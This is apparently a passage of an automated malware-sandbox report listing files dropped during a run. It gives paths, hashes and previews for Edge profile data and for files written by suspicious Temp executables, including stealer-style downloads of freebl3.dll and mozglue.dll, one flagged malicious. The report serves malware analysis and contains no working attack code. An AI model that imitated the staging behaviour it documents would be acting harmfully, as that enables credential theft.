                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".sctqri20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.....................................w..U..G...W6.>.........."....."...24.."."Ep/IEjrCOzDaHH8Lyds/cyKfGU6kWe/UyKSCE9A7WNk="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.V@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .`2.......,.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677402E6-A3C.pma

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                    Entropy (8bit):0.04671968526843988
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:pW+g+0pqtm7nOAx6YCEJgA8x5XSggykfhMNNE4QIi/ERQcUdBvIivJjzn8y08Tcp:A+n0ct0QEgk9hgkYIdfvJf08T2RGOD
                                                                                                                                                                                                                                                    MD5:ACB4331F2E58A506DDAC5A73ECBCF011
                                                                                                                                                                                                                                                    SHA1:57A0F8664157792C9352BE155A6B614922E3536D
                                                                                                                                                                                                                                                    SHA-256:851D660F9CF5E44BD6D217D14F4CF733FB9C0D1C2F249205A5EEA37743DB7E33
                                                                                                                                                                                                                                                    SHA-512:C109F5D25B0946FE48AD5B40B48297A2342F10857DF4DAA115EE98950AE890372FF300E3D232ABC82642E3214803AF90F3749CAEFDAE53C1819882F49FDAD9F3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................g..8W..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".sctqri20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.....................................w..U?:K...G...W6.>.........."....."...24.."."Ep/IEjrCOzDaHH8Lyds/cyKfGU6kWe/UyKSCE9A7WNk="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.V@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.......

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                    Entropy (8bit):4.147870920005786
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlEkjgh/JVJExcBUDmTKTPr3tlwBVP/Sh/JzvghwRHIsKqJBQIlOllt:o1Ez/fJPUDmTEdlwBVsJDYOIeBQn/
                                                                                                                                                                                                                                                    MD5:F92242C48A2A65306A4DBCA36F2D4FB2
                                                                                                                                                                                                                                                    SHA1:F82F5878DE4FE39B31A7C4F740D73B819287F47A
                                                                                                                                                                                                                                                    SHA-256:7127372C0ED5765D70CAE75DD7FD2B8AFC786FC015FF47F7D51B25DD7E9B717B
                                                                                                                                                                                                                                                    SHA-512:D75307F207DBC5C948EE12C4DEF072ABB300F1D35C7B0134958A96046D3E255D0BEDCC890752D4644F78D32A6DB73DA20D14368406A629A26243678510EA03EE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:sdPC..........................A...a.Tp"Ep/IEjrCOzDaHH8Lyds/cyKfGU6kWe/UyKSCE9A7WNk="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................487f69de-52fa-434b-98f3-2f0d2be104d4............

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:117.0.2045.47

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f998.TMP (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2f9b8.TMP (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3063b.TMP (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3064a.TMP (copy)

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):85
                                                                                                                                                                                                                                                    Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
                                                                                                                                                                                                                                                    MD5:265DB1C9337422F9AF69EF2B4E1C7205
                                                                                                                                                                                                                                                    SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
                                                                                                                                                                                                                                                    SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
                                                                                                                                                                                                                                                    SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f09eac7e-7d3f-4989-9f4a-332df245b1cf.tmp

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):56311
                                                                                                                                                                                                                                                    Entropy (8bit):6.104094645641397
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k1MyrWo9ZUA93Vp4lTcfAIra8V4mWAHrLtyRgnMUK8y:z/Ps+wsI7yn3HlKxs1j0RGoD
                                                                                                                                                                                                                                                    MD5:7E86BB82F9749C228B8D2DC6B7A28E5A
                                                                                                                                                                                                                                                    SHA1:82A8832C88E3441A69A42998151F73E45B56BB53
                                                                                                                                                                                                                                                    SHA-256:0E154907D07E6156AB0290553D5F1F29FD9D94F5E370A7082D358DC5986AF6F8
                                                                                                                                                                                                                                                    SHA-512:16BE21C2A5D742061327AA1F8FB420B19E850B5288A424D7D3A96AD0DD14B876976D37CE8983A630248F8296183903624A36D9F9A34A11DFD4DAE2C24D71F040
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\568p2nk[1].htm

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):612
                                                                                                                                                                                                                                                    Entropy (8bit):4.903167881740855
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:hYNp/qwNFDvNbJw4xxaboR1XKCf0ktEjo+Y/lNQd40UlNRVxWU+oQL:hYNpnjbJwtsvXD05oP/l8tUlj7W7
                                                                                                                                                                                                                                                    MD5:E3EB0A1DF437F3F97A64ACA5952C8EA0
                                                                                                                                                                                                                                                    SHA1:7DD71AFCFB14E105E80B0C0D7FCE370A28A41F0A
                                                                                                                                                                                                                                                    SHA-256:38FFD4972AE513A0C79A8BE4573403EDCD709F0F572105362B08FF50CF6DE521
                                                                                                                                                                                                                                                    SHA-512:43573B0CBAAC6E2E1646E6217D2D10C40AD10B9DB1F4492D6740545E793C891B5E39283A082896C0392B88EB319DFA9392421B1C89C094C9CE9F31B53D37EBAF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>.<title>Welcome to nginx!</title>.<style>. body {. width: 35em;. margin: 0 auto;. font-family: Tahoma, Verdana, Arial, sans-serif;. }.</style>.</head>.<body>.<h1>Welcome to nginx!</h1>.<p>If you see this page, the nginx web server is successfully installed and.working. Further configuration is required.</p>..<p>For online documentation and support please refer to.<a href="http://nginx.org/">nginx.org</a>.<br/>.Commercial support is available at.<a href="http://nginx.com/">nginx.com</a>.</p>..<p><em>Thank you for using nginx.</em></p>.</body>.</html>.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
